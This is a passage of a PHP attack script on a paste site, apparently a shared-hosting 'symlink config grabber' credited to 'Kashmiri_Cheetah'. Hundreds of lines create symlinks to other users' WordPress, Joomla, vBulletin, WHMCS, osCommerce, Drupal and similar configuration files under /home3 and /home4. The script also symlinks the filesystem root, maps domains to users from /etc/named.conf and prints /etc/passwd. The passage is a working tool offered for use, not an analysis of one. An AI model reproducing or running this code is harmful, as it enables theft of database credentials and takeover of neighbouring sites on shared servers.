  351.             @symlink('/home3/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  352.             @symlink('/home3/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  353.             @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  354.             @symlink('/home3/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  355.             @symlink('/home3/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  356.             @symlink('/home3/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  357.             @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  358.             @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  359.             @symlink('/home3/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  360.             @symlink('/home3/' . $user . '/public_html/home3/wp-config.php', $user . '-wp-home3.txt');
  361.             @symlink('/home3/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  362.             @symlink('/home3/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  363.             @symlink('/home3/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  364.             @symlink('/home3/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  365.             @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  366.             @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  367.             @symlink('/home3/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  368.             @symlink('/home3/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  369.             @symlink('/home3/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  370.             @symlink('/home3/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  371.             @symlink('/home3/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  372.             @symlink('/home3/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  373.             @symlink('/home3/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  374.             @symlink('/home3/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  375.             @symlink('/home3/' . $user . '/public_html/home3/configuration.php', $user . '-joomla-home3.txt');
  376.             @symlink('/home3/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  377.             @symlink('/home3/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  378.             @symlink('/home3/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  379.             @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  380.             @symlink('/home3/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  381.             @symlink('/home3/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  382.             @symlink('/home3/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  383.             @symlink('/home3/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  384.             @symlink('/home3/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  385.             @symlink('/home3/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  386.             @symlink('/home3/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  387.             @symlink('/home3/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  388.             @symlink('/home3/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  389.             @symlink('/home3/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  390.             @symlink('/home3/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  391.             @symlink('/home3/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  392.             @symlink('/home3/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  393.             @symlink('/home3/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  394.             @symlink('/home3/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  395.             @symlink('/home3/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  396.             @symlink('/home3/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  397.             @symlink('/home3/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  398.             @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  399.             @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images.txt');
  400.             @symlink('/home3/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  401.             @symlink('/home3/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  402.             @symlink('/home3/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  403.             @symlink('/home3/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  404.             @symlink('/home3/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  405.             @symlink('/home3/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  406.             @symlink('/home3/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  407.             @symlink('/home3/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  408.             @symlink('/home3/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  409.             @symlink('/home3/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  410.             @symlink('/home3/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  411.             @symlink('/home3/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  412.             @symlink('/home3/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  413.             @symlink('/home3/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  414.             @symlink('/home3/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  415.             @symlink('/home3/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  416.             @symlink('/home3/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  417.             @symlink('/home3/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  418.             @symlink('/home3/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  419.             @symlink('/home3/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  420.             @symlink('/home3/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  421.             @symlink('/home3/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  422.             @symlink('/home3/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  423.             @symlink('/home3/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  424.             @symlink('/home3/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  425.             @symlink('/home3/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  426.             @symlink('/home3/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  427.             @symlink('/home3/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  428.             @symlink('/home3/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  429.             @symlink('/home3/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  430.             @symlink('/home3/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  431.             @symlink('/home3/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  432.             @symlink('/home3/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  433.             @symlink('/home3/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  434.             @symlink('/home3/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  435.             @symlink('/home3/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  436.             @symlink('/home3/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  437.             @symlink('/home3/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  438.             @symlink('/home3/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  439.             @symlink('/home3/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  440.             @symlink('/home3/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  441.             @symlink('/home3/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  442.             @symlink('/home3/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  443.             @symlink('/home3/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  444.             @symlink('/home3/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  445.             @symlink('/home3/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  446.             @symlink('/home3/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  447.             @symlink('/home3/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  448.             @symlink('/home3/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  449.             @symlink('/home3/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  450.             @symlink('/home3/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  451.             @symlink('/home3/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  452.             @symlink('/home3/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  453.             @symlink('/home3/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  454.             @symlink('/home4/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  455.             @symlink('/home4/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  456.             @symlink('/home4/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  457.             @symlink('/home4/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  458.             @symlink('/home4/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  459.             @symlink('/home4/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  460.             @symlink('/home4/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  461.             @symlink('/home4/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  462.             @symlink('/home4/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  463.             @symlink('/home4/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  464.             @symlink('/home4/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  465.             @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  466.             @symlink('/home4/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  467.             @symlink('/home4/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  468.             @symlink('/home4/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  469.             @symlink('/home4/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  470.             @symlink('/home4/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  471.             @symlink('/home4/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  472.             @symlink('/home4/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  473.             @symlink('/home4/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  474.             @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  475.             @symlink('/home4/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  476.             @symlink('/home4/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  477.             @symlink('/home4/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  478.             @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  479.             @symlink('/home4/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  480.             @symlink('/home4/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  481.             @symlink('/home4/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  482.             @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  483.             @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  484.             @symlink('/home4/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  485.             @symlink('/home4/' . $user . '/public_html/home4/wp-config.php', $user . '-wp-home4.txt');
  486.             @symlink('/home4/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  487.             @symlink('/home4/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  488.             @symlink('/home4/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  489.             @symlink('/home4/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  490.             @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  491.             @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  492.             @symlink('/home4/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  493.             @symlink('/home4/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  494.             @symlink('/home4/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  495.             @symlink('/home4/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  496.             @symlink('/home4/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  497.             @symlink('/home4/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  498.             @symlink('/home4/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  499.             @symlink('/home4/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  500.             @symlink('/home4/' . $user . '/public_html/home4/configuration.php', $user . '-joomla-home4.txt');
  501.             @symlink('/home4/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  502.             @symlink('/home4/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  503.             @symlink('/home4/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  504.             @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  505.             @symlink('/home4/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  506.             @symlink('/home4/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  507.             @symlink('/home4/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  508.             @symlink('/home4/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  509.             @symlink('/home4/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  510.             @symlink('/home4/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  511.             @symlink('/home4/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  512.             @symlink('/home4/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  513.             @symlink('/home4/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  514.             @symlink('/home4/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  515.             @symlink('/home4/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  516.             @symlink('/home4/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  517.             @symlink('/home4/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  518.             @symlink('/home4/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  519.             @symlink('/home4/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  520.             @symlink('/home4/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  521.             @symlink('/home4/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  522.             @symlink('/home4/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  523.             @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  524.             @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images.txt');
  525.             @symlink('/home4/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  526.             @symlink('/home4/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  527.             @symlink('/home4/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  528.             @symlink('/home4/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  529.             @symlink('/home4/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  530.             @symlink('/home4/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  531.             @symlink('/home4/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  532.             @symlink('/home4/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  533.             @symlink('/home4/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  534.             @symlink('/home4/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  535.             @symlink('/home4/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  536.             @symlink('/home4/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  537.             @symlink('/home4/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  538.             @symlink('/home4/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  539.             @symlink('/home4/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  540.             @symlink('/home4/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  541.             @symlink('/home4/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  542.             @symlink('/home4/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  543.             @symlink('/home4/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  544.             @symlink('/home4/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  545.             @symlink('/home4/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  546.             @symlink('/home4/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  547.             @symlink('/home4/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  548.             @symlink('/home4/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  549.             @symlink('/home4/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  550.             @symlink('/home4/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  551.             @symlink('/home4/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  552.             @symlink('/home4/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  553.             @symlink('/home4/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  554.             @symlink('/home4/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  555.             @symlink('/home4/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  556.             @symlink('/home4/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  557.             @symlink('/home4/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  558.             @symlink('/home4/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  559.             @symlink('/home4/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  560.             @symlink('/home4/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  561.             @symlink('/home4/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  562.             @symlink('/home4/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  563.             @symlink('/home4/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  564.             @symlink('/home4/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  565.             @symlink('/home4/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  566.             @symlink('/home4/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  567.             @symlink('/home4/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  568.             @symlink('/home4/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  569.             @symlink('/home4/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  570.             @symlink('/home4/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  571.             @symlink('/home4/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  572.             @symlink('/home4/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  573.             @symlink('/home4/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  574.             @symlink('/home4/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  575.             @symlink('/home4/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  576.             @symlink('/home4/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  577.             @symlink('/home4/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  578.             @symlink('/home4/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  579.             @symlink('/', 'Kashmiri_Cheetah/root');
  580.         }
  581.         echo "<center><a href='Kashmiri_Cheetah/root'><h1>./ root</h1></a><br>
  582. <br>
  583. <center><a href='Kashmiri_Cheetah'><h1>./ Configurations</h1></a><br>";
  584.         echo "<title># Domains & Users</title>
  585.    
  586.    <style>
  587.    
  588.    body,table{ font-family:Verdana,tahoma; color: white; font-size:10px; }
  589.    
  590.    A:link {text-decoration: none;color: green;}
  591.    
  592.    A:active {text-decoration: none;color: white;}
  593.    
  594.    A:visited {text-decoration: none;color: red;}
  595.    
  596.    A:hover {text-decoration: underline; color: blue;}
  597.    
  598.    #new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
  599.    
  600.    tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
  601.    
  602.    </style>
  603.    
  604.    <p align=center># Domains & Users</p>
  605.    
  606.    <p align=center> Maked By Kashmiri_Cheetah..!</p><center>";
  607.         $d0mains = @file("/etc/named.conf");
  608.         if (!$d0mains) {
  609.             die("<b># can't ReaD -> [ /etc/named.conf ]");
  610.         }
  611.         echo "<table align=center border=1>
  612.    
  613.    <tr bgcolor=green><td>DOMAINS</td><td>USERs</td></tr>";
  614.         foreach ($d0mains as $d0main) {
  615.             if (eregi("zone", $d0main)) {
  616.                 preg_match_all('#zone "(.*)"#', $d0main, $domains);
  617.                 flush();
  618.                 if (strlen(trim($domains[1][0])) > 2) {
  619.                     $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
  620.                     echo "<tr><td><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user['name'] . "</td></tr>";
  621.                     flush();
  622.                 }
  623.             }
  624.         }
  625.         echo "</table>
  626.    
  627.    <p align='center'>
  628.    
  629.    (c)0d3d By <a href='https://www.facebook.com/100001942648326'>Kashmiri_Cheetah</a> | <br>
  630.    
  631.    MaDe in Dubai, UAE by Kashmiri Cheetah (r)
  632.    
  633.    </p>
  634.    
  635.    ";
  636.     } else {
  637.         echo '<center>
  638. <form method="POST">
  639. <textarea name="passwd" style="border:1px dotted #59E817; width: 543px; height: 420px; background-color:#0C0C0C; font-family:Tahoma; font-size:8pt; color:#59E817">';
  640.         flush();
  641.         $file = '/etc/passwd';
  642.         $read = @fopen($file, 'r');
  643.         if ($read) {
  644.             $body = @fread($read, @filesize($file));
  645.             echo "" . htmlentities($body) . "";
  646.         } elseif (!$read) {
  647.             $read = @show_source($file);
  648.         } elseif (!$read) {
  649.             $read = @highlight_file($file);
  650.         } elseif (!$read) {
  651.             for ($uid = 0;$uid < 1000;$uid++) {
  652.                 $ara = posix_getpwuid($uid);
  653.                 if (!empty($ara)) {
  654.                     while (list($key, $val) = each($ara)) {
  655.                         print "$val:";
  656.                     }
  657.                     print "
  658. ";
  659.                 }
  660.             }
  661.         }
  662.         flush();
  663.         echo '</textarea></br>
  664. <p>&nbsp;</p><center>
  665. <input name="m" size="80" value="Start" type="submit" style="border:1px dotted #59E817; width: 99; font-family:Tahoma; font-size:10pt; color:#59E817; text-transform:uppercase; height:23; background-color:#0C0C0C"/></br>
  666. </form>
  667. ';
  668.     }
  669.     echo '
  670.  
  671. </body>
  672. </html>';
  673. }
  674. ?><?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement